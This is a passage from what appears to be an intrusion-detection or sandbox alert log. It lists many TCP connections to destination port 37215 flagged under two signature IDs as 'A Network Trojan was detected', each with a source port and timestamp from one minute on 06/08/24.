          SID:2835222
          Source Port:37010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168352
          SID:2829579
          Source Port:45282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884546
          SID:2829579
          Source Port:54328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132089
          SID:2835222
          Source Port:56282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860628
          SID:2829579
          Source Port:47928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.821079
          SID:2835222
          Source Port:41920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704678
          SID:2829579
          Source Port:35340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150308
          SID:2829579
          Source Port:59172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599971
          SID:2829579
          Source Port:37964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264148
          SID:2835222
          Source Port:59162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858463
          SID:2835222
          Source Port:35808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408737
          SID:2835222
          Source Port:60684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407300
          SID:2829579
          Source Port:38042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514382
          SID:2829579
          Source Port:49138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406566
          SID:2829579
          Source Port:33116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266455
          SID:2835222
          Source Port:38048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789130
          SID:2829579
          Source Port:32834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015428
          SID:2835222
          Source Port:51598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159232
          SID:2835222
          Source Port:52320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732193
          SID:2835222
          Source Port:57922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731615
          SID:2829579
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135591
          SID:2829579
          Source Port:50872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401917
          SID:2829579
          Source Port:59652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274276
          SID:2835222
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236752
          SID:2835222
          Source Port:34480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449500
          SID:2835222
          Source Port:33316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160647
          SID:2835222
          Source Port:51006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242206
          SID:2835222
          Source Port:47796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602253
          SID:2829579
          Source Port:60764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601683
          SID:2835222
          Source Port:44740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306346
          SID:2835222
          Source Port:60424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517984
          SID:2829579
          Source Port:39426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606278
          SID:2829579
          Source Port:51098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177061
          SID:2829579
          Source Port:50094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274056
          SID:2829579
          Source Port:52572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239941
          SID:2829579
          Source Port:48092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793349
          SID:2829579
          Source Port:40200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745847
          SID:2829579
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262387
          SID:2829579
          Source Port:43872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897773
          SID:2829579
          Source Port:41224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829772
          SID:2829579
          Source Port:34956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747814
          SID:2829579
          Source Port:42664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744662
          SID:2829579
          Source Port:48834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599257
          SID:2829579
          Source Port:43256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730117
          SID:2829579
          Source Port:37296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599352
          SID:2829579
          Source Port:42686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.293388
          SID:2835222
          Source Port:59616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161142
          SID:2835222
          Source Port:44326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114477
          SID:2829579
          Source Port:50354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166454
          SID:2829579
          Source Port:54732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860980
          SID:2835222
          Source Port:51492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554644
          SID:2829579
          Source Port:33098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178407
          SID:2829579
          Source Port:51286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813318
          SID:2829579
          Source Port:58384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467594
          SID:2829579
          Source Port:39714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857874
          SID:2835222
          Source Port:33300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606345
          SID:2829579
          Source Port:57946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441988
          SID:2835222
          Source Port:42106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161048
          SID:2835222
          Source Port:53240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741125
          SID:2829579
          Source Port:58672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781953
          SID:2835222
          Source Port:48560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295595
          SID:2835222
          Source Port:41454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133001
          SID:2829579
          Source Port:48094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233658
          SID:2829579
          Source Port:51162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800353
          SID:2829579
          Source Port:48122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035795
          SID:2829579
          Source Port:35648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550063
          SID:2835222
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460825
          SID:2829579
          Source Port:59434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409660
          SID:2835222
          Source Port:41198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671897
          SID:2835222
          Source Port:49530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812872
          SID:2829579
          Source Port:51796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842017
          SID:2835222
          Source Port:57054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108992
          SID:2829579
          Source Port:55318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059709
          SID:2829579
          Source Port:54724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.821013
          SID:2835222
          Source Port:46838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897363
          SID:2829579
          Source Port:36540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.149841
          SID:2835222
          Source Port:35442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163300
          SID:2835222
          Source Port:38620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266422
          SID:2835222
          Source Port:45750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850691
          SID:2829579
          Source Port:38844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070893
          SID:2835222
          Source Port:43348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672888
          SID:2829579
          Source Port:46398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099170
          SID:2835222
          Source Port:57176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843972
          SID:2835222
          Source Port:60420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174116
          SID:2835222
          Source Port:57370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895131
          SID:2835222
          Source Port:44996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136017
          SID:2829579
          Source Port:35168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446884
          SID:2835222
          Source Port:33184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746143
          SID:2835222
          Source Port:60926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894000
          SID:2829579
          Source Port:58800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173302
          SID:2835222
          Source Port:49686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302426
          SID:2835222
          Source Port:41814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883782
          SID:2835222
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731366
          SID:2835222
          Source Port:47704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514495
          SID:2829579
          Source Port:50678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800798
          SID:2835222
          Source Port:44492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704919
          SID:2829579
          Source Port:40540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894113
          SID:2835222
          Source Port:40482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817435
          SID:2835222
          Source Port:52452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239216
          SID:2829579
          Source Port:60310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020352
          SID:2835222
          Source Port:54412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736966
          SID:2829579
          Source Port:40064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792696
          SID:2835222
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841940
          SID:2835222
          Source Port:42412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465518
          SID:2835222
          Source Port:48200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599950
          SID:2835222
          Source Port:34598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185486
          SID:2835222
          Source Port:33804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456430
          SID:2835222
          Source Port:51210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897037
          SID:2829579
          Source Port:60288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270867
          SID:2835222
          Source Port:49896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.147716
          SID:2829579
          Source Port:33074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732826
          SID:2829579
          Source Port:57650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604690
          SID:2829579
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471951
          SID:2829579
          Source Port:57420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745344
          SID:2835222
          Source Port:51550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912596
          SID:2835222
          Source Port:60066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463373
          SID:2829579
          Source Port:42478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449802
          SID:2829579
          Source Port:43154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800997
          SID:2829579
          Source Port:40336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518073
          SID:2829579
          Source Port:48940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056598
          SID:2829579
          Source Port:38232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108826
          SID:2829579
          Source Port:43168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261348
          SID:2835222
          Source Port:46258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800944
          SID:2835222
          Source Port:55430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468133
          SID:2835222
          Source Port:52498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237991
          SID:2829579
          Source Port:44564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442385
          SID:2835222
          Source Port:38472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807055
          SID:2835222
          Source Port:49716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126616
          SID:2829579
          Source Port:52684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467134
          SID:2829579
          Source Port:52358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817226
          SID:2829579
          Source Port:38838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897250
          SID:2835222
          Source Port:38774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740450
          SID:2829579
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237959
          SID:2835222
          Source Port:32816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746360
          SID:2829579
          Source Port:45906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353280
          SID:2835222
          Source Port:41254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111156
          SID:2835222
          Source Port:56516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600966
          SID:2835222
          Source Port:37942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038944
          SID:2835222
          Source Port:37774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159976
          SID:2829579
          Source Port:47028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353903
          SID:2835222
          Source Port:46510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512888
          SID:2829579
          Source Port:53088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465962
          SID:2829579
          Source Port:37250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673578
          SID:2829579
          Source Port:35176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464009
          SID:2829579
          Source Port:40292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706880
          SID:2835222
          Source Port:34406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793537
          SID:2829579
          Source Port:48826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894176
          SID:2835222
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059533
          SID:2835222
          Source Port:59700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274076
          SID:2829579
          Source Port:48560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810307
          SID:2829579
          Source Port:34602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737066
          SID:2835222
          Source Port:42196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107346
          SID:2829579
          Source Port:50176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729870
          SID:2829579
          Source Port:50584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259667
          SID:2829579
          Source Port:49426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747571
          SID:2835222
          Source Port:36172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272598
          SID:2835222
          Source Port:38612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732904
          SID:2829579
          Source Port:56946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546868
          SID:2829579
          Source Port:60992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161143
          SID:2829579
          Source Port:39468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813294
          SID:2829579
          Source Port:44978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184223
          SID:2835222
          Source Port:48920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306137
          SID:2835222
          Source Port:43088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784239
          SID:2835222
          Source Port:49578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884651
          SID:2829579
          Source Port:32990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732383
          SID:2835222
          Source Port:42208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178801
          SID:2829579
          Source Port:56026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513798
          SID:2835222
          Source Port:56730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512813
          SID:2829579
          Source Port:43474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130673
          SID:2835222
          Source Port:40834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179936
          SID:2829579
          Source Port:59076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792521
          SID:2829579
          Source Port:40374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035175
          SID:2835222
          Source Port:59300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352655
          SID:2835222
          Source Port:59502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709707
          SID:2829579
          Source Port:55768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353478
          SID:2835222
          Source Port:34924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811832
          SID:2829579
          Source Port:58454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059777
          SID:2829579
          Source Port:37014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.176194
          SID:2835222
          Source Port:47234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192308
          SID:2829579
          Source Port:43016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671729
          SID:2835222
          Source Port:49344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266267
          SID:2835222
          Source Port:43630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471018
          SID:2829579
          Source Port:58470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801813
          SID:2829579
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272116
          SID:2835222
          Source Port:55840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742355
          SID:2829579
          Source Port:36616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460972
          SID:2835222
          Source Port:48242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797717
          SID:2835222
          Source Port:45578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266264
          SID:2835222
          Source Port:33060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743775
          SID:2829579
          Source Port:54406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259090
          SID:2835222
          Source Port:52240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861460
          SID:2835222
          Source Port:34742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070869
          SID:2829579
          Source Port:48046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188951
          SID:2829579
          Source Port:56304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449906
          SID:2835222
          Source Port:34104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099295
          SID:2835222
          Source Port:48900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.110805
          SID:2835222
          Source Port:35880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471184
          SID:2835222
          Source Port:55376
          Destination Port:37215
